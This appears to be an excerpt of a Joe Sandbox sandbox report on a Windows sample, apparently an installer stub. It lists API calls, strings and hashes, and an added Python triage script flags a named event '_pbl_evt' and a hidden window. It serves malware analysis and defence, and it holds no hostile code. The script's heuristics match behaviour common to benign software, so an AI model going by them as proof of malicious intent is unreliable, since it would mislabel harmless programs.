• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Cnd_broadcastCurrentMtx_unlockThread
• String ID: x
• API String ID: 2021000804-2985756205
• Opcode ID: 71b2fe114a02b90303af788872719721de4d5182e076bd3bda1d26bfdcea2ab0
• Instruction ID: 329cb0f4139fdfea99fd58a010a50365ed6c6510dfd3b3d7d3b0aaddc478dc42
• Opcode Fuzzy Hash: 71b2fe114a02b90303af788872719721de4d5182e076bd3bda1d26bfdcea2ab0
• Instruction Fuzzy Hash: 4101BC366007029FDB259FA5C8516AAF3B6FF50365F198439E45EA7240F731AC00CAB0
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00D84BBD,?,?,00000000,?,?,?,00D84CE7,00000002,FlsGetValue,00E09F08,FlsGetValue), ref: 00D84C19
• GetLastError.KERNEL32(?,00D84BBD,?,?,00000000,?,?,?,00D84CE7,00000002,FlsGetValue,00E09F08,FlsGetValue,?,?,00D81B04), ref: 00D84C23
• LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00D84C4B
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
• Opcode ID: af1007659f603cde4c66010d4f5a769485048ebb3472eab457ab97eca6cb63f7
• Instruction ID: 730d00f8b673e189c7729625b691b591b4ae73c49ed097ff539b3a8a52e5650c
• Opcode Fuzzy Hash: af1007659f603cde4c66010d4f5a769485048ebb3472eab457ab97eca6cb63f7
• Instruction Fuzzy Hash: 1CE04830240705BBFF102F51ED06B5D3B5DAB00B95F144031FA4CB40F5EB7299989755
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,00001037,00000000,00000000), ref: 00BD6F78
• SendMessageW.USER32(?,00001036,00000000,00000000), ref: 00BD6F8D
  • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
  • Part of subcall function 00CABAD0: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,000000EF,?,00BD6FC8,00000000,80004005), ref: 00CABB38
  • Part of subcall function 00CABAD0: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CABB68
• SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00BD70C3
• SendMessageW.USER32(?,00001061,00000000,00000005), ref: 00BD71BF
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: MessageSend$AllocHeapWindow
• String ID:
• API String ID: 2851540245-0
• Opcode ID: fa5a28003387cb662097787eb3187ef2ee97bb175f8deb767e9d52153a41f3bd
• Instruction ID: d3cf8495f8108f50266e9550731c79e1533e386c35c39d6072e299a76996c7cb
• Opcode Fuzzy Hash: fa5a28003387cb662097787eb3187ef2ee97bb175f8deb767e9d52153a41f3bd
• Instruction Fuzzy Hash: A8C17E71A002099FDB14DFA8C895BEEFBF5FF48314F14425AE415AB290EB75A944CBA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SysAllocStringLen.OLEAUT32(00000000,?), ref: 00BC545A
• SysFreeString.OLEAUT32(00000000), ref: 00BC54A6
• SysFreeString.OLEAUT32(00000000), ref: 00BC54C8
• SysFreeString.OLEAUT32(00000000), ref: 00BC5623
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: String$Free$Alloc
• String ID:
• API String ID: 986138563-0
• Opcode ID: 707beaca8886a19f302a68e6566feb0aa736eda433bb39b8a6bd39c7a3f34bcc
• Instruction ID: d396bba3d3dec063719bebf3a624b5339c079d1b2e8d024e3450c3c4abaa0883
• Opcode Fuzzy Hash: 707beaca8886a19f302a68e6566feb0aa736eda433bb39b8a6bd39c7a3f34bcc
• Instruction Fuzzy Hash: 7BA18D71A00609AFDB25CFA8CC85FAEB7F8EF44714F10425DE515E7280EB74AA45CB61
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000001,0000110A,00000004,?), ref: 00BE0645
• SendMessageW.USER32(00000001,0000110A,00000001,00000000), ref: 00BE0677
• SendMessageW.USER32(?,0000110A,00000004,?), ref: 00BE07EE
• SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00BE0816
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: f28fa67e677a95ad66e048b039cf223cf8fa1983a952af1e97302db90b398c91
• Instruction ID: e310b3c2a4fb6720942c442b27aa495ab92415e62c31e166742ba48ff46bfc8b
• Opcode Fuzzy Hash: f28fa67e677a95ad66e048b039cf223cf8fa1983a952af1e97302db90b398c91
• Instruction Fuzzy Hash: D4916C71A10244AFCB25EF69D880BEEB7F5FF48310F0445A9E441A7291DBB0AC85CFA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegCloseKey.ADVAPI32(00000000,1FC3D414), ref: 00CFD686
• _wcsrchr.LIBVCRUNTIME ref: 00CFD6B0
• RegQueryValueExW.ADVAPI32(00000000,1FC3D414,00000000,00000000,00000000,00000000,1FC3D414,00000001,?,00000000,00000000), ref: 00CFD733
• RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00CFD77F
  • Part of subcall function 00CFD530: RegOpenKeyExW.ADVAPI32(00000000,1FC3D414,00000000,00020019,00000002,1FC3D414,00000001,00000010,00000002,00CFC85C,1FC3D414,00000000,00000000), ref: 00CFD5CC
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Close$OpenQueryValue_wcsrchr
• String ID:
• API String ID: 213811329-0
• Opcode ID: e75ab037630c7e39a92f74e1f7aa9cb2d9924aa7c7dfbb850ecce892b3d07243
• Instruction ID: 8becc14ac8c22264a866d03a62e50ac542f9c69a058191465abc441bed09c801
• Opcode Fuzzy Hash: e75ab037630c7e39a92f74e1f7aa9cb2d9924aa7c7dfbb850ecce892b3d07243
• Instruction Fuzzy Hash: 7151227290034D9FDB00DF68D944BAEBBB5EF40320F24826AF925AB3C0D7709A04CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• CloseHandle.KERNEL32(?,1FC3D414,?,?,?), ref: 00CE4D6A
• CloseHandle.KERNEL32(?,1FC3D414,?,?,?), ref: 00CE4D8A
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: CloseHandle
• String ID: <3$<3
• API String ID: 2962429428-260659822
• Opcode ID: c5ab4c0a9c7d079fc3f84c8fcee9ee90db62fc535098bfde679f9b4c0bd48b16
• Instruction ID: bd61b8fcf8d4c85f67cc0b97f6c2e11f2c1dd8653e281397a583a6c34b724118
• Opcode Fuzzy Hash: c5ab4c0a9c7d079fc3f84c8fcee9ee90db62fc535098bfde679f9b4c0bd48b16
• Instruction Fuzzy Hash: 4D515730901A85CFE701CF69C948B4AFBF5EF49314F1482A9D455DB2A1EB34EA05CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindResourceW.KERNEL32(00000000,?,00000017,1FC3D414,?,00E99310,?,?,?,?,00000000,Function_00223FBD,000000FF,?,?,00E99310), ref: 00C602C9
• LoadResource.KERNEL32(00000000,00000000,?,00E99310,?,?,?,?,00000000,Function_00223FBD,000000FF,?,?,00E99310,?), ref: 00C602D8
• LockResource.KERNEL32(00000000,?,00E99310,?,?,?,?,00000000,Function_00223FBD,000000FF,?,?,00E99310,?), ref: 00C602E3
• SizeofResource.KERNEL32(00000000,?,?,00E99310,?,?,?,?,00000000,Function_00223FBD,000000FF,?,?,00E99310,?), ref: 00C602F4
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: 38035d052526fde8959bef15020b8a28ebeab0790223e5c8ce3b948e0ada797f
• Instruction ID: d933a2476225e801270006af2df894134c505256687410089cf77d346696c69d
• Opcode Fuzzy Hash: 38035d052526fde8959bef15020b8a28ebeab0790223e5c8ce3b948e0ada797f
• Instruction Fuzzy Hash: 7C31D171D057059BE7209F39DD45BABB7B8FF08B10F204629E865A7380EF309A08C7A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

APIs
• SetWindowLongW.USER32(?,000000FC,00000000), ref: 00BCF169
• GetParent.USER32(?), ref: 00BCF19D
  • Part of subcall function 00D7FA13: GetProcessHeap.KERNEL32(00000008,00000008,00000000,00CF5F3E,?,?,?,?,?,?), ref: 00D7FA18
  • Part of subcall function 00D7FA13: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D7FA1F
• SetWindowLongW.USER32(?,000000EB), ref: 00BCF1D0
• ShowWindow.USER32(?,00000000), ref: 00BCF1E6
Similarity
• API ID: Window$HeapLong$AllocParentProcessShow
• String ID:
• API String ID: 78937335-0
• Opcode ID: b375de48b08b936c47a66a8315ba0c6aca2db8f030ebcb369f2cf9c1024d5198
• Instruction ID: 52cf7849a9e2c6e5ad9aa0b2af025b3dd2a33ec3a67895a8f2ec055f50d70368
• Opcode Fuzzy Hash: b375de48b08b936c47a66a8315ba0c6aca2db8f030ebcb369f2cf9c1024d5198
• Instruction Fuzzy Hash: 7B2150746047029FC720DF29D844E2BBBE9FF49715B444A6EF49AD2662E730E808CB61
Uniqueness
• Uniqueness Score: -1.00%

APIs
• ResetEvent.KERNEL32(?,?,000003E8,00D04DC2,?,?,?,?,?,00000003,00000000,1FC3D414,?,000003E8), ref: 00D059A2
• GetLastError.KERNEL32(?,?,000003E8,00D04DC2,?,?,?,?,?,00000003,00000000,1FC3D414,?,000003E8), ref: 00D059CF
• WaitForSingleObject.KERNEL32(?,0000000A,?,?,000003E8,00D04DC2,?,?,?,?,?,00000003,00000000,1FC3D414,?,000003E8), ref: 00D05A05
• SetEvent.KERNEL32(?,?,?,000003E8,00D04DC2,?,?,?,?,?,00000003,00000000,1FC3D414,?,000003E8), ref: 00D05A28
Similarity
• API ID: Event$ErrorLastObjectResetSingleWait
• String ID:
• API String ID: 708712559-0
• Opcode ID: 4c6c7dd72f181fe175c6b3c46a9946b8af20227f61a71d6c9a8411ab2a4a74bb
• Instruction ID: c727c32ed437fc957fa601307601ede9f42c9b4e50e2abf5a762be8b36318d39
• Opcode Fuzzy Hash: 4c6c7dd72f181fe175c6b3c46a9946b8af20227f61a71d6c9a8411ab2a4a74bb
• Instruction Fuzzy Hash: 0E119431254F408EE7709B1AF984B577B95BF50324F08591EE487925A5C760FCC5CF60
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SleepConditionVariableCS.KERNELBASE(?,00D80397,00000064), ref: 00D8041D
• LeaveCriticalSection.KERNEL32(00E97DCC,?,?,00D80397,00000064,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414), ref: 00D80427
• WaitForSingleObjectEx.KERNEL32(?,00000000,?,00D80397,00000064,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414), ref: 00D80438
• EnterCriticalSection.KERNEL32(00E97DCC,?,00D80397,00000064,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?), ref: 00D8043F
Similarity
• API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
• String ID:
• API String ID: 3269011525-0
• Opcode ID: 6be11563961f3fc5088b62c0063f3b066e757b5ee44d3b58e515b71843c70850
• Instruction ID: 2a7f73c1ae8b140fc4ee3980fa3f07454bb5f4e734e2c2cb966907192949eb47
• Opcode Fuzzy Hash: 6be11563961f3fc5088b62c0063f3b066e757b5ee44d3b58e515b71843c70850
• Instruction Fuzzy Hash: C3E09231655625AFCE013F82ED089A93E28DF06751B040022F6CD72170CA62099C9BE5
Uniqueness
• Uniqueness Score: -1.00%

APIs
• OpenEventW.KERNEL32(00000000,00000000,1FC3D414,_pbl_evt,00000008,?,?,00E2B480,00000001,1FC3D414,00000000), ref: 00D2264E
• CreateEventW.KERNEL32(00000000,00000001,00000001,?), ref: 00D2266B
Strings
Similarity
• API ID: Event$CreateOpen
• String ID: _pbl_evt
• API String ID: 2335040897-4023232351
• Opcode ID: 703073515fc01b93a2f9ec4f358e4d044ff500af5c51b1840fdb546dc7d1212d
• Instruction ID: 716e6125a208961f7f03737bcdcc0da1e49ec3dd30b070b4dca10432638a0dd1
• Opcode Fuzzy Hash: 703073515fc01b93a2f9ec4f358e4d044ff500af5c51b1840fdb546dc7d1212d
• Instruction Fuzzy Hash: 5051A071D00218EFDB10DF68DC46BEEB7B8FB18714F108259E915B7290EB706A05CBA5
Uniqueness
• Uniqueness Score: -1.00%
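The per-function API listings in this report are the raw material a triager turns into behaviours and indicators. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses API lines in the exact format used above and flags two things this section shows. First, OpenEventW on the fixed name `_pbl_evt` followed by CreateEventW in the same function, which is the usual "is another copy already running?" idiom and makes the event name a host indicator (the single-instance reading is an interpretation of the call sequence, not something the report states). Second, SetWindowLongW followed by ShowWindow(hwnd, 0), where 0 is the documented SW_HIDE value, so the window is hidden. The two sample blocks are copied from the listings above and embedded as constructed input; the function names (`parse_api_block`, `find_named_events`, `hides_own_window`) and the pattern rules are this example's own.

```python
"""Parse Joe Sandbox per-function 'APIs' lines and flag two behaviours seen in
the report section above. Added example, not the report's or the sample's own
code; sample blocks are copied from the page, everything else is constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import List, Optional

# Matches lines such as
#   • OpenEventW.KERNEL32(00000000,...,_pbl_evt,...), ref: 00D2264E
#   • Part of subcall function 00D7FA13: HeapAlloc.KERNEL32(00000000,?), ref: 00D7FA1F
#   • ___free_lconv_mon.LIBCMT ref: 00DA16C0          (no argument list at all)
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][\w:]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: list               # int for an 8-digit hex value, None for '?', str otherwise
    ref: int                 # address of the call site
    subcall: Optional[int]   # callee address when listed as 'Part of subcall function'

def _parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    # Caveat: a literal string that happens to be exactly 8 hex digits is read as a number.
    if re.fullmatch(r"-?[0-9A-F]{8}", tok):
        return int(tok, 16)
    return tok

def parse_api_block(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # 'APIs' / 'Strings' headings and blank lines are skipped
        raw = m["args"]
        args = [_parse_arg(t) for t in raw.split(",")] if raw else []
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls

def _top_level(calls: List[ApiCall]) -> List[ApiCall]:
    return [c for c in calls if c.subcall is None]

def find_named_events(calls: List[ApiCall]) -> List[str]:
    """OpenEventW on a fixed name, then CreateEventW in the same function: the
    common 'am I already running?' check. The only string argument of
    OpenEventW is the event name, which is usable as a host indicator."""
    found = []
    top = _top_level(calls)
    for i, c in enumerate(top):
        if c.api != "OpenEventW":
            continue
        name = next((a for a in c.args if isinstance(a, str)), None)
        if name and any(d.api == "CreateEventW" for d in top[i + 1:]):
            found.append(name)
    return found

SW_HIDE = 0  # ShowWindow nCmdShow value that hides the window

def hides_own_window(calls: List[ApiCall]) -> bool:
    """SetWindowLongW plus ShowWindow(hwnd, SW_HIDE) in one function: a window
    attribute is changed and the window is then hidden, so no UI is shown."""
    top = _top_level(calls)
    return (any(c.api == "SetWindowLongW" for c in top) and
            any(c.api == "ShowWindow" and len(c.args) > 1 and c.args[1] == SW_HIDE
                for c in top))

# Two API blocks copied from the report above (constructed input for this demo).
EVENT_BLOCK = """\
APIs
• OpenEventW.KERNEL32(00000000,00000000,1FC3D414,_pbl_evt,00000008,?,?,00E2B480,00000001,1FC3D414,00000000), ref: 00D2264E
• CreateEventW.KERNEL32(00000000,00000001,00000001,?), ref: 00D2266B
"""

WINDOW_BLOCK = """\
APIs
• SetWindowLongW.USER32(?,000000FC,00000000), ref: 00BCF169
• GetParent.USER32(?), ref: 00BCF19D
  • Part of subcall function 00D7FA13: GetProcessHeap.KERNEL32(00000008,00000008,00000000,00CF5F3E,?,?,?,?,?,?), ref: 00D7FA18
  • Part of subcall function 00D7FA13: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D7FA1F
• SetWindowLongW.USER32(?,000000EB), ref: 00BCF1D0
• ShowWindow.USER32(?,00000000), ref: 00BCF1E6
"""

if __name__ == "__main__":
    print("named events:", find_named_events(parse_api_block(EVENT_BLOCK)))
    print("hides window:", hides_own_window(parse_api_block(WINDOW_BLOCK)))
```

Only top-level calls are matched by the two rules; subcall lines are kept in the parsed output (with `subcall` set) so that heap or CRT helpers pulled in by a function do not trigger a pattern that belongs to the function itself. The event name recovered here can be checked on a suspect host with any handle-enumeration tool that lists named Event objects.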

APIs
  • Part of subcall function 00D9820D: RtlFreeHeap.NTDLL(00000000,00000000,?,00DA1120,?,00000000,?,?,00DA13C1,?,00000007,?,?,00DA1813,?,?), ref: 00D98223
  • Part of subcall function 00D9820D: GetLastError.KERNEL32(?,?,00DA1120,?,00000000,?,?,00DA13C1,?,00000007,?,?,00DA1813,?,?), ref: 00D9822E
• ___free_lconv_mon.LIBCMT ref: 00DA16C0
Strings
Similarity
• API ID: ErrorFreeHeapLast___free_lconv_mon
• String ID: XB$p@
• API String ID: 4068849827-310831944
• Opcode ID: e64291ad945d7b7141baa2b9aca11a4d0ffe5d7a6b14de439cd8ddb5de9b23e4
• Instruction ID: 59f8e521058822598d66d2a053104cb5ace8d8015685035d515e8858049f952e
• Opcode Fuzzy Hash: e64291ad945d7b7141baa2b9aca11a4d0ffe5d7a6b14de439cd8ddb5de9b23e4
• Instruction Fuzzy Hash: 7B312735601740DFEF21AF78D845F5A77E9EF02710F285929E0A9D71A1DF31A8809B74
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FormatMessageW.KERNEL32(000013FF,00000000,?,00000000,00000000,00000000,00000000,1FC3D414,00E2A7FC), ref: 00CD50AC
• LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 00CD51A3
  • Part of subcall function 00CC49B0: std::locale::_Init.LIBCPMT ref: 00CC4A8D
  • Part of subcall function 00CC2440: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00CC2515
Strings
• Failed to get Windows error message [win32 error 0x, xrefs: 00CD50CA
Similarity
• API ID: FormatFreeInitIos_base_dtorLocalMessagestd::ios_base::_std::locale::_
• String ID: Failed to get Windows error message [win32 error 0x

APIs
• IsWindow.USER32(00000002), ref: 00BC392B
• IsWindow.USER32(00000002), ref: 00BC3942
Strings
Similarity
• API ID: Window
• String ID: 0[

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00BF575B
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BF57BE
Strings
Similarity
• API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
• String ID: bad locale name

APIs
• VirtualQuery.KERNEL32(80000000,00D7D1C8,0000001C,00D7D3BD,00000000,?,?,?,?,?,?,?,00D7D1C8,00000004,00E978D4,00D7D44D), ref: 00D7D294
• GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00D7D1C8,00000004,00E978D4,00D7D44D), ref: 00D7D2AF
Strings
Similarity
• API ID: InfoQuerySystemVirtual
• String ID: D

APIs
Strings
• 4V, xrefs: 00BC328D
• C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00BC3252
Similarity
• API ID: ActiveWindow
• String ID: 4V$C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp

APIs
Strings
• 4V, xrefs: 00BC35FE
• C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00BC35C3
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ActiveWindow
                                                                                                                                                                        • String ID: 4V$C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp
                                                                                                                                                                        • API String ID: 2558294473-3853628876
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
• C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00BC32E0
• 4V, xrefs: 00BC331D
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: ActiveWindow
• String ID: 4V$C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp
• API String ID: 2558294473-3853628876
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
• C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00BC3654
• 4V, xrefs: 00BC3691
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: ActiveWindow
• String ID: 4V$C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp
• API String ID: 2558294473-3853628876
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetParent.USER32(0000000F), ref: 00BD80A2
Strings
• Unknown exception, xrefs: 00BD8077
• C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h, xrefs: 00BD8087
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Parent
• String ID: C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h$Unknown exception
• API String ID: 975332729-9186675
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
• Unknown exception, xrefs: 00BC36EA
• C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00BC36FD
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: ActiveWindow
• String ID: C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp$Unknown exception
• API String ID: 2558294473-2631306498
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
• Unknown exception, xrefs: 00BC3376
• C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00BC3386
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: ActiveWindow
• String ID: C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp$Unknown exception
• API String ID: 2558294473-2631306498
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00BC9C30: InitializeCriticalSectionAndSpinCount.KERNEL32(00E97D50,00000000,1FC3D414,00BB0000,Function_001F7F70,000000FF,?,00D7F6C3,?,?,?,00BB7586), ref: 00BC9C55
  • Part of subcall function 00BC9C30: GetLastError.KERNEL32(?,00D7F6C3,?,?,?,00BB7586), ref: 00BC9C5F
• IsDebuggerPresent.KERNEL32(?,?,?,00BB7586), ref: 00D7F6C7
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BB7586), ref: 00D7F6D6
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D7F6D1
Memory Dump Source
